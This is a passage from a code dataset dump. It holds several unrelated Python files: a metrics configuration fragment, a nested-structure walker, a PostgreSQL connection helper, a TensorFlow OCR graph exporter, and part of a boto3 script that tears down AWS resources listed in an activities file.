'corrective_commits', 'corrective_rate', 'file_ccp', 'authors',\n 'avg_coupling_size'] + ADMINISTRATIVE_FEATURES\n\nCONCEPTS_DICT = {'file_ccp': the_lower_the_better\n #, 'avg_coupling_size': the_lower_the_better\n , 'avg_coupling_code_size_cut': the_lower_the_better\n , 'same_day_duration_avg': the_lower_the_better\n , 'prev_touch_ago': the_lower_the_better\n , 'random_metric': the_lower_the_better\n\n }\nCONCEPT_NAMES = {'file_ccp': 'CCP'\n , 'avg_coupling_code_size_cut': 'Coupling'\n , 'same_day_duration_avg': 'Duration'\n , 'prev_touch_ago': 'Detection'\n , 'random_metric': 'Random'\n }\n\nnot_to_binary_columns = ['line_count_100', 'length_group','quality_group', 'worse_10_hs', 'authors', 'year'] \\\n + list(CONCEPTS_DICT.keys())\n\nFEATURE_STATS_FILE = 'features_stats.csv'\n\nNUMERIC_NULL = -1\nTEST_SIZE = 0.2\nRANDOM_STATE = 37\n\nEARLIEST_ANALYZED_YEAR = 2017\n\nMIN_YEAR = 2017\nMAX_YEAR = 2019\n\nCOHANGE_STATS_TEMPLATE = 'cochange_stats_{metric}.csv'\n\nRELATIVE_MEANS_FILE = 'relative_means.csv'\n\nPREDICTIVE_STATS_TEMPLATE = 'predictive_stats_{concept}.csv'\nMONOTONE_PATH_TEMPLATE = join(DATA_PATH, \"monotnoicity_to_{monotone_column}.csv\")\nAUTHOR_TWIN_CM_TEMPLATE = 'file_by_author_twin_cm_{concept}.csv'\nAUTHOR_TWIN_PEARSON_TEMPLATE = 'file_by_author_twin_corr_{concept}.csv'\nJOINT_STATS_TEMPLATE = 'joint_feature_stats_{concept}.csv'\n\nRELATIVE_MEAN_PREFIX = 'cond_mean_'\nRELATIVE_MEAN_DIFF_PREFIX = 'cond_mean_diff_'\n","sub_path":"code/python/configuration.py","file_name":"configuration.py","file_ext":"py","file_size_in_byte":7126,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"619757221","text":"def walk(obj):\n\n def set_node_by_path(obj, path, val):\n temp = obj\n #iterate through this level of keys\n for k in temp.keys() if type(temp) == dict else xrange(len(temp)):\n #if we're on the right track\n if k == path[0]:\n #Are we at the end?\n if len(path) == 1:\n temp[k] = val\n else:\n #recurse against temp[k]\n temp[k] = set_node_by_path(temp[k], path[1::], val)\n return temp\n\n\n def isiterable(o):\n return getattr(obj, '__iter__', False)\n\n def _walk(sub_obj, cb, acc=[]):\n # It would be nice to have this actually output a full object instead of\n # just attaching things to it later.\n class Node(object):\n def __init__(self, node, acc):\n self.value = node\n self.key = acc[-1]\n self.is_leaf = isiterable(node)\n self.is_root = (acc == [])\n self.path = acc\n self.level = len(acc)\n def set(self, v):\n return set_node_by_path(obj, self.path, v)\n\n\n # either the keys of the dict, or the indices of the list/tuple\n if getattr(sub_obj, '__iter__', False):\n for k in sub_obj.keys() if type(sub_obj) == dict else xrange(len(sub_obj)):\n #print obj[k]\n node = Node(sub_obj[k], acc+[k])\n #print(node)\n cb(node)\n if isiterable(sub_obj):\n _walk(sub_obj[k], cb, acc+[k])\n\n return lambda cb: _walk(obj, cb)\n\nif __name__==\"__main__\":\n tree = {'a': 1, 'b': [9, 9, 6, 7, 6]}\n\n print(\"Tree before: \"+repr(tree))\n\n @walk(tree)\n def node_printer(node):\n if node.value == [9, 9, 6, 7, 6] :\n node.set([9, 9, 7, 7, 5])\n\n print(\"Tree after: \"+repr(tree))\n","sub_path":"pywalk/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1898,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"54267415","text":"from django.db import connection\nfrom decouple import config\nimport psycopg2\n\nclass QueryBuilder():\n ps_connection = 
psycopg2.connect(user=config('DATABASE_USER'),\n password=config('DATABASE_PASSWORD'),\n host=config('DATABASE_HOST'),\n port=config('DATABASE_PORT'),\n database=config('DATABASE_NAME'))\n\n cursor = ps_connection.cursor()\n\n def __init__(self):\n try:\n self.ps_connection = psycopg2.connect(user=config('DATABASE_USER'),\n password=config('DATABASE_PASSWORD'),\n host=config('DATABASE_HOST'),\n port=config('DATABASE_PORT'),\n database=config('DATABASE_NAME'))\n self.cursor = self.ps_connection.cursor()\n except BaseException as e:\n print(str(e))\n\n def dispose(self):\n try:\n self.ps_connection.commit()\n self.cursor.close()\n except BaseException as e:\n print(str(e))\n try:\n self.ps_connection.close()\n except BaseException as e:\n print(str(e))\n\n def closeConnection(self):\n try:\n self.cursor.close()\n self.ps_connection.close()\n except BaseException as e:\n print(str(e))\n\n def commit(self):\n try:\n self.conn.commit()\n except BaseException as e:\n print(str(e))\n\n \n \n \n \n \n\n \n ","sub_path":"cars/utility/query_builder.py","file_name":"query_builder.py","file_ext":"py","file_size_in_byte":1675,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"42877710","text":"from __future__ import absolute_import\r\nfrom __future__ import division\r\nfrom __future__ import print_function\r\n\r\nimport math\r\nfrom six.moves import xrange\r\n\r\nimport tensorflow as tf\r\n\r\nfrom tensorflow.python.platform import gfile\r\nimport distance\r\nimport numpy as np\r\n\r\nfrom model.cnn import CNN\r\nfrom model.seq2seq_model import Seq2SeqModel\r\nfrom util.data_gen import DataGen\r\n\r\nslim = tf.contrib.slim\r\n\r\ntf.app.flags.DEFINE_integer(\r\n 'attn_num_hidden', 128,\r\n 'Number of hidden units in each layer in attention model.')\r\n\r\ntf.app.flags.DEFINE_integer(\r\n 'attn_num_layers', 2,\r\n 'Number of layers in attention model.')\r\n\r\ntf.app.flags.DEFINE_boolean(\r\n 'use_gru', False,\r\n 'Whether or not use GRU instead of LSTM.')\r\n\r\ntf.app.flags.DEFINE_integer(\r\n 'max_prediction_length', 11,\r\n 'Maximum length of the predicted string.')\r\n\r\ntf.app.flags.DEFINE_integer(\r\n 'max_image_height', 500,\r\n 'Maximum image height.')\r\n\r\ntf.app.flags.DEFINE_integer(\r\n 'max_image_width', 500,\r\n 'Maximum image width.')\r\n\t\r\ntf.app.flags.DEFINE_integer(\r\n 'target_embedding_size', 10,\r\n 'Embedding size for each target.')\r\n\t\r\ntf.app.flags.DEFINE_integer(\r\n 'gpu_id', 0,\r\n 'ID of the GPU to use (-1: CPU).')\r\n\r\ntf.app.flags.DEFINE_string(\r\n 'output_file', '', 'Where to save the resulting file to.')\r\n\r\nFLAGS = tf.app.flags.FLAGS\r\n\r\ndef prepare_image(img, width):\r\n\t\"\"\"Resize the image to a maximum height of `self.height` and maximum\r\n\twidth of `self.width` while maintaining the aspect ratio. 
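	(Illustrative arithmetic, assuming DataGen.IMAGE_HEIGHT were 32: a 60x300 input
	gets max_width = ceil(300 / 60 * 32) = 160, so it is first resized to 32x160.)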
Pad the\r\n\tresized image to a fixed size of ``[self.height, self.width]``.\"\"\"\r\n\tdims = tf.shape(img)\r\n\t\r\n\timg_data = tf.expand_dims(img, 0)\r\n\t\r\n\theight = tf.constant(DataGen.IMAGE_HEIGHT, dtype=tf.int32)\r\n\theight_float = tf.constant(DataGen.IMAGE_HEIGHT, dtype=tf.float64)\r\n\r\n\tmax_width = tf.to_int32(tf.ceil(tf.truediv(dims[1], dims[0]) * height_float))\r\n\tmax_height = tf.to_int32(tf.ceil(tf.truediv(width, max_width) * height_float))\r\n\r\n\tresized = tf.cond(\r\n\t\ttf.greater_equal(width, max_width),\r\n\t\tlambda: tf.cond(\r\n\t\t\ttf.less_equal(dims[0], height),\r\n\t\t\tlambda: tf.to_float(img_data),\r\n\t\t\tlambda: tf.image.resize_images(img_data, [height, max_width],\r\n\t\t\t\t\t\t\tmethod=tf.image.ResizeMethod.BICUBIC),\r\n\t\t),\r\n\t\tlambda: tf.image.resize_images(img_data, [max_height, width],\r\n\t\t\t\t\t\t\tmethod=tf.image.ResizeMethod.BICUBIC)\r\n\t)\r\n\r\n\tpadded = tf.image.pad_to_bounding_box(resized, 0, 0, height, width)\r\n\t\r\n\treturn padded\r\n\r\ndef build_graph(input_image,\r\n\t\t\t\tattn_num_hidden,\r\n\t\t\t\tattn_num_layers,\r\n\t\t\t\tuse_gru,\r\n\t\t\t\tmax_prediction_length,\r\n\t\t\t\tmax_image_height,\r\n\t\t\t\tmax_image_width,\r\n\t\t\t\ttarget_embedding_size):\r\n\t\t\t\t\r\n\t# We need resized width, not the actual width\r\n\tmax_resized_width = 1. * max_image_width / max_image_height * DataGen.IMAGE_HEIGHT\r\n\t\r\n\tmax_original_width = max_image_width\r\n\tmax_width = int(math.ceil(max_resized_width))\r\n\t\r\n\tencoder_size = int(math.ceil(1. * max_width / 4))\r\n\tdecoder_size = max_prediction_length + 2\r\n\tbuckets = [(encoder_size, decoder_size)]\r\n\r\n\timg_data = prepare_image(input_image, max_width)\r\n\t\r\n\tnum_images = tf.shape(img_data)[0]\r\n\t\r\n\tencoder_masks = []\r\n\tfor i in xrange(encoder_size + 1):\r\n\t\tencoder_masks.append(\r\n\t\t\ttf.tile([[1.]], [num_images, 1])\r\n\t\t)\r\n\r\n\tdecoder_inputs = []\r\n\ttarget_weights = []\r\n\tfor i in xrange(decoder_size + 1):\r\n\t\tdecoder_inputs.append(\r\n\t\t\ttf.tile([0], [num_images])\r\n\t\t)\r\n\t\tif i < decoder_size:\r\n\t\t\ttarget_weights.append(tf.tile([1.], [num_images]))\r\n\t\telse:\r\n\t\t\ttarget_weights.append(tf.tile([0.], [num_images]))\r\n\t\r\n\tcnn_model = CNN(img_data, False)\r\n\t\r\n\tconv_output = cnn_model.tf_output()\r\n\tperm_conv_output = tf.transpose(conv_output, perm=[1, 0, 2])\r\n\tattention_decoder_model = Seq2SeqModel(\r\n\t\tencoder_masks=encoder_masks,\r\n\t\tencoder_inputs_tensor=perm_conv_output,\r\n\t\tdecoder_inputs=decoder_inputs,\r\n\t\ttarget_weights=target_weights,\r\n\t\ttarget_vocab_size=len(DataGen.CHARMAP),\r\n\t\tbuckets=buckets,\r\n\t\ttarget_embedding_size=target_embedding_size,\r\n\t\tattn_num_layers=attn_num_layers,\r\n\t\tattn_num_hidden=attn_num_hidden,\r\n\t\tforward_only=True,\r\n\t\tuse_gru=use_gru)\r\n\r\n\ttable = tf.contrib.lookup.MutableHashTable(\r\n\t\tkey_dtype=tf.int64,\r\n\t\tvalue_dtype=tf.string,\r\n\t\tdefault_value=\"\",\r\n\t\tcheckpoint=True)\r\n\r\n\tinsert = table.insert(\r\n\t\ttf.constant(list(range(len(DataGen.CHARMAP))), dtype=tf.int64),\r\n\t\ttf.constant(DataGen.CHARMAP))\r\n\t\r\n\twith tf.control_dependencies([insert]):\r\n\t\tnum_feed = []\r\n\t\tprb_feed = []\r\n\r\n\t\tfor line in xrange(len(attention_decoder_model.output)):\r\n\t\t\tguess = tf.argmax(attention_decoder_model.output[line], axis=1)\r\n\t\t\tproba = tf.reduce_max(\r\n\t\t\t\t\ttf.nn.softmax(attention_decoder_model.output[line]), 
axis=1)\r\n\t\t\tnum_feed.append(guess)\r\n\t\t\tprb_feed.append(proba)\r\n\r\n\t\t# Join the predictions into a single output string.\r\n\t\ttrans_output = tf.transpose(num_feed)\r\n\t\ttrans_output = tf.map_fn(\r\n\t\t\tlambda m: tf.foldr(\r\n\t\t\t\tlambda a, x: tf.cond(\r\n\t\t\t\t\ttf.equal(x, DataGen.EOS_ID),\r\n\t\t\t\t\tlambda: '',\r\n\t\t\t\t\tlambda: table.lookup(x) + a # pylint: disable=undefined-variable\r\n\t\t\t\t),\r\n\t\t\t\tm,\r\n\t\t\t\tinitializer=''\r\n\t\t\t),\r\n\t\t\ttrans_output,\r\n\t\t\tdtype=tf.string\r\n\t\t)\r\n\r\n\t\t# Calculate the total probability of the output string.\r\n\t\ttrans_outprb = tf.transpose(prb_feed)\r\n\t\ttrans_outprb = tf.gather(trans_outprb, tf.range(tf.size(trans_output)))\r\n\t\ttrans_outprb = tf.map_fn(\r\n\t\t\tlambda m: tf.foldr(\r\n\t\t\t\tlambda a, x: tf.multiply(tf.cast(x, tf.float64), a),\r\n\t\t\t\tm,\r\n\t\t\t\tinitializer=tf.cast(1, tf.float64)\r\n\t\t\t),\r\n\t\t\ttrans_outprb,\r\n\t\t\tdtype=tf.float64\r\n\t\t)\r\n\r\n \r\n\t\tprediction = tf.cond(\r\n\t\t\ttf.equal(tf.shape(trans_output)[0], 1),\r\n\t\t\tlambda: trans_output[0],\r\n\t\t\tlambda: trans_output,\r\n\t\t)\r\n\t\tprobability = tf.cond(\r\n\t\t\ttf.equal(tf.shape(trans_outprb)[0], 1),\r\n\t\t\tlambda: trans_outprb[0],\r\n\t\t\tlambda: trans_outprb,\r\n\t\t)\r\n\r\n\t\treturn prediction, probability\r\n\r\ndef main(_):\r\n\t#if not FLAGS.output_file:\r\n\t#\traise ValueError('You must supply the path to save to with --output_file')\r\n\ttf.logging.set_verbosity(tf.logging.INFO)\r\n\twith tf.Graph().as_default() as graph:\r\n\t\t\r\n\t\tinput = tf.placeholder(name='input', dtype=tf.uint8, shape=[None, None, 3])\r\n\t\t\r\n\t\tdevice_id = '/cpu:0'\r\n\t\tif FLAGS.gpu_id >= 0:\r\n\t\t\tdevice_id = '/gpu:' + str(FLAGS.gpu_id)\r\n\t\t\r\n\t\twith tf.device(device_id):\r\n\t\t\r\n\t\t\tprediction, probability = build_graph(input,\r\n\t\t\t\tattn_num_hidden=FLAGS.attn_num_hidden,\r\n\t\t\t\tattn_num_layers=FLAGS.attn_num_layers,\r\n\t\t\t\tuse_gru=FLAGS.use_gru,\r\n\t\t\t\tmax_prediction_length=FLAGS.max_prediction_length,\r\n\t\t\t\tmax_image_height=FLAGS.max_image_height,\r\n\t\t\t\tmax_image_width=FLAGS.max_image_width,\r\n\t\t\t\ttarget_embedding_size=FLAGS.target_embedding_size)\r\n\t\t\r\n\t\t\ttf.identity(prediction, name='prediction')\r\n\t\t\ttf.sigmoid(probability, name='probability')\r\n\t\t\r\n\t\tgraph_def = graph.as_graph_def()\r\n\t\twith gfile.GFile('exported-model/frozen_inference_graph.pb', 'wb') as f:\r\n\t\t\tf.write(graph_def.SerializeToString())\r\n\r\nif __name__ == '__main__':\r\n tf.app.run()\r\n","sub_path":"aocr/export-graph.py","file_name":"export-graph.py","file_ext":"py","file_size_in_byte":6869,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"51"} +{"seq_id":"552092348","text":"'''\nCreated on Sep 5, 2016\n\n@author: Sunny\n'''\nimport configparser\nimport inspect\nimport os.path\nimport sys\nimport time\nimport datetime\nfrom pprint import pprint\n\nimport boto3\nimport botocore\nimport texttable as tt\nfrom Camellia.Mod import Mod_SetSession,Mod_CreateWorkspace\n\n\nclass cls_DeleteEnvironment:\n activities_File=''\n list_Sections=[]\n list_Sections_Undeleted=[]\n vpc_id=''\n id_Region='us-west-2'\n myobj_SetSession=''\n obj_client_ec2_resource=''\n obj_client_ec2=''\n obj_client_s3=''\n obj_client_sqs=''\n obj_client_dynamodb=''\n obj_client_elasticbeanstalk=''\n file_IniFile_tasks=''\n def __init__(self):\n #CONSTRUCTOR\n print('\\n{:=^80}'.format(''))\n print('\\n{: ^80}'.format('START: ' + 
datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")))\n print('\\n{:=^80}'.format(''))\n #self.file_IniFile_tasks = \"E:\\pythonProgs\\SPOD\\Tasks\".replace(\"\\\\\", \"/\")\n if len(sys.argv) < 2:\n print('No input has been given to Camellia.')\n self.file_IniFile_tasks=str(input('Please provide the path of Tasks directory: ')).replace(\"\\\\\",\"/\")\n else:\n self.file_IniFile_tasks=str(sys.argv[1]).replace(\"\\\\\",\"/\")\n\n obj_Workspace= Mod_CreateWorkspace.cls_CreateWorkspace(self.file_IniFile_tasks)\n dir_workspace=obj_Workspace.m_Return_EnvironmentName()\n self.activities_File=os.path.join(dir_workspace,'Activities.ini').replace(\"\\\\\",\"/\")\n self.m_GetSessionFromActivities()\n self.myobj_SetSession= Mod_SetSession.cls_SetSession()\n \n #self.obj_client_ec2_resource = boto3.resource('ec2',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key)\n #self.obj_client_ec2=boto3.client('ec2',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key)\n #self.obj_client_s3=boto3.client('s3',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key)\n #self.obj_client_sqs=boto3.client('sqs',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key)\n #self.obj_client_dynamodb=boto3.client('dynamodb',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key)\n #self.obj_client_elasticbeanstalk=boto3.client('elasticbeanstalk',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key)\n\n def m_PrintInTable(self, str_key, str_value):\n tab = tt.Texttable()\n # tab.set_deco(tab.HEADER)\n # tab.set_deco(2)\n tab.set_cols_width([50, 100])\n tab.set_cols_align(['l', 'l'])\n str_value = ': ' + str_value\n row = [str_key, str_value]\n tab.add_row(row)\n print(tab.draw())\n def m_GetSessionFromActivities(self):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n config = configparser.ConfigParser()\n config.optionxform = str\n config.read(self.activities_File)\n var_Tag='0'\n var_Tag=var_Tag.lower()\n tags_InINI=config.items(var_Tag)\n for tag in tags_InINI:\n self.id_Region=tag[1]\n self.m_PrintInTable('Region',self.id_Region)\n def m_Delete_Activities(self):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n config = configparser.ConfigParser()\n config.optionxform = str\n config.read(self.activities_File)\n for sections in config.sections():\n if sections != '0' : # 0 tag is reserved for Region\n self.list_Sections.append(int(sections))\n print(self.list_Sections)\n self.list_Sections.sort(reverse=True)\n list_sections_str=[]\n for sections in self.list_Sections:\n list_sections_str.append(str(sections))\n self.list_Sections=list_sections_str\n print(self.list_Sections)\n ####################\n #Get VPC ID \n for tags in self.list_Sections:\n myitem=config.items(tags)\n if str(myitem[0][1]).lower()== 'create_vpc'.lower():\n self.vpc_id=str(myitem[1][1]).lower()\n print(self.vpc_id)\n ###################\n for tags in self.list_Sections:\n myitem=config.items(tags)\n b_return=self.m_Delete_Core(myitem)\n if b_return==False:\n self.list_Sections_Undeleted.append(tags)\n print(\"===============================\")\n print('Delete undeleted items')\n if len(self.list_Sections_Undeleted)>0:\n 
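            # Second pass: entries that failed in the reverse-ordered first pass
            # (typically DependencyViolation, because a dependent resource still
            # referenced them) are retried here once their dependents are gone.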
print(self.list_Sections_Undeleted)\n for tags in self.list_Sections_Undeleted:\n myitem=config.items(tags)\n #b_return=self.m_Delete_Core(myitem)\n print(myitem)\n for tags in self.list_Sections_Undeleted:\n myitem=config.items(tags)\n b_return=self.m_Delete_Core(myitem)\n else:\n print(\"No undeleted items\")\n print('\\n{:=^80}'.format(''))\n print('\\n{: ^80}'.format('FINISH: ' + datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")))\n print('\\n{:=^80}'.format(''))\n def m_Delete_Core(self,myitem):\n b_return=False\n if str(myitem[0][1]).lower()== 'create_dynamodbtable'.lower():\n #b_return=self.m_Delete_dynamodbtable(myitem[1][1])\n pass\n elif str(myitem[0][1]).lower()== 'create_sqs'.lower():\n #b_return=self.m_Delete_SQS(myitem[1][1])\n pass\n elif str(myitem[0][1]).lower()== 'create_s3bucket'.lower():\n #b_return=self.m_Delete_S3Bucket(myitem[1][1])\n pass\n elif str(myitem[0][1]).lower()== 'create_elasticbeanstalk_application'.lower():\n b_return=self.m_Delete_elasticbeanstalk_application(myitem[1][1])\n elif str(myitem[0][1]).lower()== 'create_elasticbeanstalk_environment'.lower():\n b_return=self.m_Delete_elasticbeanstalk_environment(myitem[1][1])\n elif str(myitem[0][1]).lower()== 'create_securitygroup'.lower():\n b_return=self.m_Delete_securitygroup(myitem[1][1])\n elif str(myitem[0][1]).lower()== 'create_routetable'.lower():\n b_return=self.m_Delete_routetable(myitem[1][1])\n elif str(myitem[0][1]).lower()== 'create_natgateway'.lower():\n b_return=self.m_Delete_natgateway(myitem[1][1])\n elif str(myitem[0][1]).lower()== 'create_subnet'.lower():\n b_return=self.m_Delete_subnet(myitem[1][1])\n elif str(myitem[0][1]).lower()== 'create_internetgateway'.lower():\n b_return=self.m_Delete_internetgateway(myitem[1][1])\n elif str(myitem[0][1]).lower()== 'create_vpc'.lower():\n b_return=self.m_Delete_vpc(myitem[1][1])\n elif str(myitem[0][1]).lower()== 'create_elasticip'.lower():\n b_return=self.m_Delete_elasticip(myitem[1][1])\n elif str(myitem[0][1]).lower()== 'create_rds_dbsubnetgroup'.lower():\n b_return=self.m_Delete_RDS_DBSubnetGroup(myitem[1][1])\n elif str(myitem[0][1]).lower()== 'Create_RDS_DBInstance'.lower():\n b_return=self.m_Delete_RDS_DBInstance(myitem[1][1])\n ###############################\n if b_return==False:\n print('WARNING: Could not delete: ',myitem[1][1])\n else:\n print('Deleted successfully: ',myitem[1][1])\n return b_return\n def m_Delete_Service(self):\n #print('Method type: ',methodType)\n pass\n def m_Delete_dynamodbtable(self,tableName):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n obj_client_dynamodb=boto3.client('dynamodb',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n response = obj_client_dynamodb.delete_table(TableName=tableName) \n pprint(response)\n self.m_Waiter_dynamodbtableToBeDeleted(tableName)\n print('-----------------------------------------')\n def m_Waiter_dynamodbtableToBeDeleted(self,tableName):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n obj_client_dynamodb=boto3.client('dynamodb',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n waiter = obj_client_dynamodb.get_waiter('table_not_exists')\n print('Waiting for the table to be deleted: {0}'.format(tableName))\n waiter.wait(TableName=tableName)\n print('Table deleted successfully: ',tableName)\n def m_Delete_SQS(self,queue_Url):\n 
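        # Deletes the queue addressed by queue_Url; boto3's delete_queue returns
        # immediately and AWS completes the deletion asynchronously (documented
        # to take up to 60 seconds), so no waiter is attempted here.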
print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n obj_client_sqs=boto3.client('sqs',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n response = obj_client_sqs.delete_queue(QueueUrl=queue_Url)\n pprint(response)\n print('-----------------------------------------')\n def m_Delete_S3Bucket(self,bucket_name):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n obj_client_s3=boto3.client('s3',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n response = obj_client_s3.delete_bucket(Bucket=bucket_name)\n pprint(response)\n self.m_Waiter_S3ToBeDeleted(bucket_name)\n print('-----------------------------------------')\n def m_Waiter_S3ToBeDeleted(self,bucket_name):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n obj_client_s3=boto3.client('s3',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n waiter = obj_client_s3.get_waiter('bucket_not_exists')\n \n print('Waiting for the bucket {0} to be deleted'.format(bucket_name))\n kwargs={\n 'Bucket':bucket_name\n }\n \n waiter.wait(**kwargs)\n print('Bucket deleted successfully: ',bucket_name)\n def m_Delete_elasticbeanstalk_application(self,elasticbeanstalk_application):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n obj_client_elasticbeanstalk=boto3.client('elasticbeanstalk',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n try:\n response = obj_client_elasticbeanstalk.delete_application(ApplicationName=elasticbeanstalk_application,TerminateEnvByForce=True)\n pprint(response)\n b_return=True\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == 'InvalidParameterValue':\n print(e)\n else:\n print(e)\n b_return=False\n except:\n print(sys.exc_info()[:2])\n b_return=False\n return b_return\n print('-----------------------------------------')\n def m_Delete_elasticbeanstalk_environment(self,elasticbeanstalk_environment):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n self.m_DescribeEnvironmentResources(elasticbeanstalk_environment)\n obj_client_elasticbeanstalk=boto3.client('elasticbeanstalk',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n try:\n response = obj_client_elasticbeanstalk.terminate_environment(EnvironmentId=elasticbeanstalk_environment,TerminateResources=True,ForceTerminate=True)\n pprint(response)\n self.m_Waiter_elasticbeanstalk_environment_ToBeDeleted(elasticbeanstalk_environment)\n b_return=True\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == 'InvalidParameterValue':\n print('WARNING: Could not find the Elastic beanstalk Environment ID: ', elasticbeanstalk_environment)\n else:\n print(e)\n b_return=False\n except:\n print(sys.exc_info()[:2])\n b_return=False\n return b_return\n print('-----------------------------------------')\n def m_DescribeEnvironmentResources(self,id_EnvironmentId):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n print('Resources attached with Elastic beanstalk environment: ',id_EnvironmentId)\n 
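        # A security group still referenced by instances or other groups cannot be
        # deleted; EC2 raises DependencyViolation, which the except clause below
        # reports so that the group can be retried in the second deletion pass.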
obj_client_elasticbeanstalk=boto3.client('elasticbeanstalk',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n print('...........To do..................')\n kwargs={\n 'EnvironmentId':id_EnvironmentId\n \n }\n pprint(kwargs)\n try:\n response = obj_client_elasticbeanstalk.describe_environment_resources(**kwargs)\n pprint(response['EnvironmentResources'])\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == 'InvalidParameterValue':\n print('WARNING: Could not find the Elastic beanstalk Environment ID: {0}'.format(id_EnvironmentId))\n print('-----------------------------------------')\n def m_Waiter_elasticbeanstalk_environment_ToBeDeleted(self,elasticbeanstalk_environment):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n obj_client_elasticbeanstalk=boto3.client('elasticbeanstalk',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n print('Waiting for the elastic beanstalk environment {0} to be deleted'.format(elasticbeanstalk_environment))\n kwargs={\n 'EnvironmentIds':[\n elasticbeanstalk_environment\n ]\n }\n total_counter=100\n for counter in range(1,total_counter):\n response = obj_client_elasticbeanstalk.describe_environments(**kwargs)\n print('\\n', counter, \".\\t\", response['Environments'][0]['Status'], \"-\\tEB environment: \",elasticbeanstalk_environment, end='\\t')\n if response['Environments'][0]['Status']=='Terminated':\n print('\\n')\n break\n else:\n for i in range(1, 40):\n time.sleep(0.25)\n print('.', end='', flush=True)\n if counter==99:\n print('\\n','Elastic beanstalk environment {0} could not be deleted successfully '.format(elasticbeanstalk_environment))\n def m_Delete_securitygroup(self,securitygroup):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n obj_client_ec2=boto3.client('ec2',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n try:\n response = obj_client_ec2.delete_security_group(DryRun=False,GroupId=securitygroup)\n pprint(response)\n b_return=True\n except botocore.exceptions.ClientError as e:\n if e.response['Error']['Code'] == 'DependencyViolation':\n print(e)\n elif e.response['Error']['Code'] == 'InvalidGroup.NotFound':\n print('WARNING: Could not find the security group: ', securitygroup)\n else:\n print(e)\n b_return=False\n except :\n print(sys.exc_info()[:2])\n b_return=False\n \n return b_return\n print('-----------------------------------------')\n def m_Delete_routetable(self,routetable):\n print('\\n{:-^80}'.format(inspect.stack()[0][3]))\n obj_client_ec2=boto3.client('ec2',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n try:\n response = obj_client_ec2.describe_route_tables(\n RouteTableIds=[\n routetable,\n ],\n Filters=[\n {\n 'Name': 'route-table-id',\n 'Values': [\n routetable\n ]\n }\n ]\n )\n pprint(response)\n #RouteTableAssociationId=response['RouteTables'][0]['Associations'][0]['RouteTableAssociationId']\n lst1=response['RouteTables'][0]['Associations']\n n=0\n obj_client_ec2_resource = boto3.resource('ec2',aws_access_key_id=self.myobj_SetSession.aws_access_key_id,aws_secret_access_key=self.myobj_SetSession.aws_secret_access_key,region_name=self.id_Region)\n for i in lst1:\n 
